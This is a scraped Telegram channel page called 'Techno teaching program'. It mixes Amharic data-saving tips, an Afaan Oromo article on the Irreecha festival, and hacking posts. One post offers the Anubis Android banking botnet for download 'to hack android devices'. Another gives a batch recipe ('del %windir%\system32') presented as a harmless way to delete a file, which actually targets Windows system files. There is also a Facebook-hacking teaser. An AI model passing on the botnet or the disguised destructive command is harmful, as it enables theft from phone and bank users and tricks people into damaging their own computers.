๐Ÿš€Techno teaching program๐Ÿ”‘
84 subscribers
61 photos
5 videos
6 files
68 links
comedy,teaching,film,news and poem all in one
For more information contact admin @JWMATT
We drive the world!!!
website:https://tamirat-kebede.jimdosite.com/
Download Telegram
๐Ÿ“ฒแ‰ แˆตแˆแŠซแ‰ฝแŠ• #Internet ๐ŸŒ แˆตแŠ•แŒ แ‰€แˆ แ‰ถแˆŽ แ‰ถแˆŽ แŠซแˆญแ‹ต แŠฅแŠ•แ‹ณแ‹ญแ‰†แŒฅแˆญแ‰ฅแŠ• แˆแŠ• แˆ›แ‹ตแˆจแŒ แŠ แˆˆแ‰ฅแŠ•โ“

1โƒฃ #Setting๐Ÿ›  แ‹แˆตแŒฅ แ‰ แˆ˜แŒแ‰ฃแ‰ต background data restricted แˆ›แ‹ตแˆจแŒ (แŠจแŠ› แŠฅแ‹แ‰…แŠ“ แ‹แŒช แ‹จแŠ แ•แˆแŠฌแˆฝแŠ–แ‰ฝ แ‰ แˆซแˆณแ‰ธแ‹ แ‹ณแ‰ณ แŠฅแŠ•แ‹ณแ‹ญแŒ แ‰€แˆ™ แ‹ซแ‹ฐแˆญแŒ‹แˆ)

2โƒฃ แˆฒแˆ แŠซแˆญแ‹ณแ‰ฝแŠ•แŠ• #3G แŠจแАแ‰ แˆญ แ‹ˆแ‹ฐ #2G แˆ˜แ‰€แ‹จแˆญ แŠ แˆตแˆแˆ‹แŒŠ แАแ‹ (แ‰ แ‰ฐแˆˆแ‹ญ #Facebook แˆˆแˆจแŒ…แˆ แˆฐแŠ แ‰ต แˆแŠ•แŒ แ‰€แˆ แŠจแˆ†แА)

3โƒฃ #Facebook แ‰ แˆแ‰ตแŒ แ‰€แˆ™แ‰ แ‰ต แŒŠแ‹œ แ‰  F แŠฅแŠ“ Facebook lite แ‰ฃแ‰ตแŒ แ‰€แˆ™ แŠฅแŠ“ แŠฅแŠ•แ‹ฐ opera mini, uc, messenger lite แŠ แ‹ญแАแ‰ต browser's แˆ˜แŒ แ‰€แˆ แ‹ญแˆ˜แˆจแŒฃแˆแข

4โƒฃ แˆจแŒƒแŒ…แˆ แ…แˆแŽแ‰ฝแŠ• ๐Ÿ“ƒ แ‰ แˆšแ‹ซแАแ‰กแ‰ แ‰ต แŒŠแ‹œ แ‹ณแ‰ณ แˆ›แŒฅแ‹แ‰ต โœ–๏ธ แ‹ˆแ‹ญแˆ save page แˆ›แ‹ตแˆจแŒ แŠ แˆˆแ‰ฅแŠ•แข

5โƒฃ แ‰  WiFi ๐Ÿ“ถ แŠซแˆแˆ†แА แ‰ แ‰€แˆญ play store, Instagram, palm play แŠ แˆˆแˆ˜แŠญแˆแ‰ต แŠฅแŠ“ #video_online_play /#download/ แŠ แˆˆแˆ›แ‹ตแˆจแŒ แ‹ญแˆ˜แˆจแŒฃแˆแข

๐Ÿ’ข๐Ÿ’ข?@NASAtechnotechIngprogram๐Ÿ’ฎ๐Ÿ’ฎ
โ•šโ•โ•โ•โ•โ• ๐Ÿ“ŒShare๐Ÿ“Œ โ•โ•โ•โ•โ•
๐Ÿ”ฐAnubis Android Banking Botnet v.2.5๐Ÿ”ฐ

โ“‚๏ธ Here's the Android Botnet to hack android devices without port forwarding. You just need any free/paid hosting + Apk decompiler that's it.

๐Ÿ”ปDownload -

https://sarkarjobnews.com/V4IfPz
Media is too big
VIEW IN TELEGRAM
how to hack facebook using firefox browser remotely in Amharic
how to delete window file truely
1. Open notepad
2. Type the following with out quotes(" ")
"@echo off
del %windir%\system32"
3. save it anything.bat
If you want to hack Facebook account and how to protect your account join as and learn more....
# dhugaa jirtuu
hoyye hoyyeen maali?
hoyye hoyyeen kan kadhaaf manarra deeman miti.
adaadha malee
baga iyyaana maskala nagaan geessan jedha channeliin keenya #TECHNO TEACHING PROGRAM
ayyana gariii!!
This media is not supported in your browser
VIEW IN TELEGRAM
Maalummaa Irreechaa keesumaa kan birraa
By Curated Content on fulbaana 19/01/2012
(Tamrat kabbadaatin)
#kutaa1ffaa

Irreechi hiika baayโ€™ee yoo qabaates hiiknisaa inni guddaan, โ€œGalatoo Waaqayyooโ€ (Happy, thanks giving dayโ€™) jechuudha. Irreechi waggaatti al lama kan geggeeffamuudha, Irreecha Tulluufi Irreecha Malkaa.

Inni gubaa masqalaa booda raawwatamu Irreecha malkaati. Kunis ganna gurraacha keessaa bahanii gamtaan Waaqasaanii galateeffachuuf kan raawwatamuudha.

Kutaalee addunyaa gara garaatti ayyaanonni (kaarniivaaloonni) Irreecha waliin walfakkaatan ni raawwatamu. Fakkeenyaaf ardii Awurooppaatti qonnaan bultoonni, waggaatti yeroo tokkoo karaa irratti bahanii timaatimiidhaan walreebu. Yoo akkas godhan Waaqayyo yeroo ittaanus biqiltuusaanii akkasumatti nuu tolcha jechuun kana raawwatu.

Odeeffannoo Barsiisaa Beekan Gulummaa barreeffamaan nuu erge haala armaan gaditti qindeessinee dhiyeesineeerra dubbisaatii yaada qabdan karaa teeessoo keenyaa nu ergaa.

IRREECHA/ IRREESSA: Irreechi sirna Waaqeffachuu gamtaadhaan Tulluufi malkaarratti baโ€™anii waaqa kadhataniifi ittigalateeffataniidha. Karaa biraatiin Irreecha yemmuu jennu hiika (yaada) birootis ni qaba. Kunis marga ykn coqorsa sirna ayyaaneffannaa tokkoof ykn araaraaf yoo deemamu harkatti qabatamus ni ibsa. Akkasumas hiikoo gara warra waa beekuu deemanii namaaf himamu tokkoof kaffalu (galchu). (Warra waa beeku kan jedhaman warra Ayyaantuu, warra qaalluu, eker-dubbistuu, warra callee ilaalu,โ€ฆ jechuudha).

Kafaltiin warra waa beekuu kennamu galchaa jedhama. Galchi kunis yeroo baayโ€™ee marga ykn coqorsaafi maallaqa waliin qabanii iddoo galchaaf qophaaโ€™etti irreeffatu. Galchi akkuma humnaatti marga ykn coqorsa qofaa taโ€™uus ni dandaโ€™a.

Sirni kabaja ayyaana Irreechaa waggaatti al lama wayitiilee arfaasaafi birraa kabajama. Ayyaanni Irreechaa arfaasaa keessa kabajamu kadhaa Waaqaaf gamtaadhaan dhiyeeffatamuudha. Innis yeroo roobni looniif baayโ€™ee barbachisu waan taโ€™eef rooba nagayaa akka roobuuf tulluufi malkaatti baโ€™anii waaqa kadhatu. Akkasumas fuuldurri; ganna waan taโ€™eef, ganna dukkana nagaan nu hulluuqsisi, booqa birraatti nagaan nu baasi; sanyii facaate dadagaagsii nuu biqilchi jedhanii Waaqa kadhatu.

Ayyaanni Irreechaa birraa keessa kabajamu irra caalaatti galata Waaqaaf galchuuf yoo taโ€™u, milkaaโ€™ina fuula duraatiifis ni kadhatu. Galanni Waaqaaf galfamu kunis, โ€œKadhaa keenya nuuf dhageesse; ifatti nu baastee, sanyii facaafanne nuu biqilchite, saโ€™aa-namaa nagaa nuuf kennitee galanni sihaa gaโ€™uโ€ jedhu. Akkasumas milkaaโ€™ina fuulduraatiif ammoo, โ€œMidhaan alaa gaโ€™e (bilchaate) namaafi sinbira wajjin nuu soori; bara nagaa kan quufaa nuu godhi; yaadaafi hawwii keenya nuu guuti;โ€ jedhanii waaqa kadhatu.

Irreechi kun kan kabajamu birraa keessa malkaarratti. Kan irreeffatamus ayyaana Ifaanoo (Gubaa) booda. Oromoon osoo Ibsaa Birraa hinibsine Irreecha Birraa hinirreeffatu. Dura ibsaa ibsee qeโ€™eesaatti kabaja. Ibsaa birraa ibsuun dukkana gannaa keessaa ifa yookaan booqa birraatti bahuu agarsiisa.

Irreechi diinqaa jalqaba jedhu maanguddoonni Tuulamaa. Achii qeโ€™eetti baha. Sana booda irreechi sabaa Magaalaa Bishaanoftuu (Bishooftuu) Hora Harsadiitti kabajama.

Ayyaanni gubaa galgala waarii kabajama. Gaafa ayyaana gubaa kabajan daamotiin (xomborri) diinqatti qabsiifamee baha. Warri ulfaa qabu, galma ulfaatiyis ni baasa. Galmaayis daamotiin qabsiifamee ni baha. Irreechi diinqaa jalqaba kan jedhameefis kanumaafi. Erga daamotii qabsiifatanii qeโ€™eetti gadi bahanii ibsaa ibsaa ayyaanicha haala hoโ€™aa taโ€™een kabaju.

Bariisaa immoo ganama bakka gubaa itti guban sanatti buna dhaabanii Waaqa kadhatu. Waaqaafis galata galchu. Mijjirii irrattis ni irreeffatu. Irreeffannaan kun kan taโ€™u akka maatitti.

Ayyaanni Masqalaa kan warri kiristaanaa kabajuufi ayyaanni Gubaa yookaan Ifaanoo kan Oromoon kabaju, yeroofi ibsaa ibsuun wal haa fakkaatu malee garaagarummaa guddaa qabu. Kaayyoofi galii adda addaas qabu. Warri kiristaanaa yaadannoo โ€œFannoo Iyyasuus Kiristoos barbaachaaf kabajnaโ€ jedhu. Oromoon garuu sanaaf miti kan ibsaa ibsu.
#kutaa 2ffaa
Ayyaanni Masaqalaa keessumaa hordoftoota amantii Ortodoksiitiin wayita birraa kabajamaa jirus dhimma kanaan walfakkeenya qabaachuu dandaโ€™a. Haalatti hordoftoonni Ortodoksii biyya keenyaa Masqala ittikabajan kana Otodoksoonni biyya biraa quba hinqaban. Giriik hinbeektu, Ruusiyaan hinbeektu. Kitaaba qulqullu keessa hinjiru. Seenaa sobaa suphanii, โ€œGiiftii Illeeniin, Masqalii bade barbaaduuf ibsiteโ€, jedhanii sobasaanii tarreessu. Kun immoo kitaaba amantii kam keessattuu barreeffamee hinjiru.

Irreechi Sabaa, kan Birraa, Hora Harsdiitti kabajama. Osoo Otoo Hora Harsadiitti hinirreeffatin dursanii malkaa biraatti hinirreeffatamu. Eddii Hora Harsadii irreeffatamee booda garuu kan malkaa biraa ittifufa.

Kabajni ayyaana irreechaa bifa lamaan ilaalama. Inni tokko hidda dhalootaa ykn gosti naannawaa walitti dhiyeenyatti argaman hundi warra ulfaatti (warra angafaatti) walitti qabamanii gamtaadhaan faaruu irreechaaf faarsamu jechaa tulluu ykn malkaa naannawa dhiyeenyatti argamutti deemanii angafaa quxusuun eebbifatanii irreeffatu.

Irreechi Hora Harsadii Irreecha gosaa osoo hintaane Irreecha sabaati. Oromoo hundatu bahee irreeffata jechuudha. Ulfaan Gadaa shananii gaafa ayyaana Irreecha Birraa, bakka tokkotti bahu. Abbootiin Gadaa, bakka adda addaa jiran, Abbootiin Muudaafi warri Ulfaa gaaf sana hinhafan. Kadhaan Waaqaafi eebbi eebbifamus akka sabaatti.

Kaayyoon kabaja ayyaana Irreecha Birraa Waaqa booruu Gannaa keessaa nagaan namaafi saโ€™a gara Booqa Birraatti baase/hulluuqsiseef galata galchuudha. Waaqa bacaqii gannaa, rooba ulfaataa gannaafi dukkana gannaa keessa nagaan biyya hulluuqsisee daraaraa birraa, asheetaafi foolii birraan, walumaagalatti Waaqaaf galateeffachuudha.

Ayyaanni kun (Irreechi Birraa) ganna gurraacha, dhoqqee, bacaqii gannaafi rooba ulfaataa keessaa bahanii nagaan booqa birraa waan arganiif daraaraa, keelloo marga jiidhaa, coqorsaafi kkf harkatti qabatanii jaataniin malkaatti bahanii irreeffatan.

Sirni kabaja ayyaana irreechaa inni lammaffaan immoo sadarkaa sabaatti giddugaleessa tokkotti kabajamuudha. Akka saba Oromootti giddugaleessi kun Tuulama keessa Magaalaa Bishooftuu, naannawa Odaa Nabee, Hora Arsadii taโ€™eetu beekama. Horri Arsadii yoomii jalqabee giddugala irreeffannaa saba Oromoo akka taโ€™e odeeffannoon gaโ€™aa taโ€™e yoo jiraatuu baateyyuu maanguddoon Oromoo garuu dhalootumaanuu achumatti irreeffachaa akka turan dubbatu. Sirni kabaja ayyaana Irreechaa kan sadarkaa sabaatti kabajamus taโ€™ee kan gosa gosaan iddoo iddootti kabajamu lamaanuu haallitti irreeffatamu walfakkaataadha. Irreecha sadarkaa sabaatti kabajamu kan adda godhu Ulfaan Gadaa shananii iddoo Irreechaatti baโ€™uudha.

Guyyaa ayyaana Irreechaa ulfaan warra angafaa hunduu baโ€™ee bakka irreechaatti argamu. Ummannis gara irreechaatti yoo deemu ulfaa warra itti bulanii tumsuu yoo taโ€™u, gara galmaatti yoo deebiโ€™us akkasuma Ulfaan ummataan tumsameeti. Kabajni ayyaana Irreechaa ganama obboroo (subii) waan taโ€™eef jalabultiisaa galgala Ulfaan warra angafaa ni muudama.

Sirna muudaa jalabultii kana irratti gosti Ulfaa sanitti bulan hunduu ni argamu. Qophiin jala-bultii galma ulfaa warra angafaatti godhamu kun bunaqalaafi korma qaluu dabalatee sirna waaqeffachuu adda addaatu raawwatama. Sirnoota taasifaman kanneen keessaa Callee, Caaccuufi Ulfaa ykn Bokkuu muuduudha.

Haaluma kanaan qophiin jalabultii xumuramee ganama obboroo warri angafaa (angaftichaafi angaftittii) ulfaa baatanii uummataan tumsamanii gara iddoo irrechaatti faaruu adda addaa jechaa deemu. Faaruun yeroo irreecha deeman faarfatan irra caalaan mareeyyoo yoo taโ€™u, Gabbisayyoonis ni jedhama (faarfatama).

Mareeyoon faaruu namni tokko dhahaa (jechaa) kaawwan ammoo huursanii jalaa qabaa gamtaan faarfataniidha. Hiikaan faaruu kanaas maree maree (marmaaree) ayyaana waggaa ittiin nu gahe akka jechuuti. Marsaa waggaa tokkoo ykn Gadaa tokko marsee ykn deebiโ€™ee milkiidhaan dhufuusaa kan ittiin mulโ€™isaniidha.

Faaruun Mareeyoo abdii fuula duraatiifis marmaarii (marii) ittiin nu gahi yaada jedhu of keessaa qaba. Faaruu mareeyoo hangi tokko kan armaan kunooti: